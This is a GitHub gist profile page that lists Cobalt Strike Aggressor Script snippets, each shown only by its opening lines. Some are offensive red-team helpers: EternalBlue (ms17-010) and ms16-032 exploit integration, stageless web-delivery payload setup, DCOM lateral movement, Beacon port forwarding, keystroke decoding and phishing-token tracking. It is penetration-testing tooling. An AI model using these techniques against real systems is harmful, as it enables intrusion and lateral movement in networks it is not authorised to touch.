Instantly share code, notes, and snippets.

Raphael Mudge rsmudge

View GitHub Profile
View mouse.cna
# demonstrate how to add a popup handler to a Swing component in Sleep
import java.awt.*;
import javax.swing.*;
import javax.swing.event.*;
# safely add a listener to show a popup
sub setupPopupMenu {
# we're using fork({}) to run this in a separate Aggressor Script environment.
View safedelete.cna
# safe delete in file browser right-click menu
popup filebrowser {
item "&Download" {
foreach $file ($3) {
bdownload($1, "$2 $+ \\ $+ $file");
View eternalblue.cna
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
# target, listener, where to save .rc file
sub generate_rc_file {
local('$target $listener $where $handle $shellcode');
($target, $listener, $where) = @_;
View stagelesspython.cna
# Python Stageless Scripted Web Delivery
# setup our stageless Python Web Delivery attack
sub setup_attack {
local('%options $x86payload $x64payload $url $script');
%options = $3;
# generate our stageless x86 payload
artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
View tokenToEmail.cna
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
local('$out $now $method $uri $addr $ua $response $size $handler $when $params');
View stagelessweb.cna
# Scripted Web Delivery (Stageless)
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.
# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
local('%options $script $url $arch');
%options = $3;
# get the arch right.
View comexec.cna
# Lateral Movement alias
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
"Synopsis: com-exec [target] [listener]\n\n" .
"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
View portfwd.cna
# port foreward alias in Beacon and SSH
# pull common code into a function
sub _portfwd {
if ($2 eq "stop") {
btask($1, "Tasked session to stop forward to $3");
call("beacons.pivot_stop_port", $null, $3);
View webkeystrokes.cna
# convert comma separated keystroke values into a string.
sub toString {
@temp = split(",", $1);
return join("", map({
return chr(parseNumber($1, 16, 10));
}, @temp));
View ms16-032.cna
# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
# 1. grab MS16-032.ps1
# 2. store it with this script
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack
# logic to run this particular attack
sub exploit {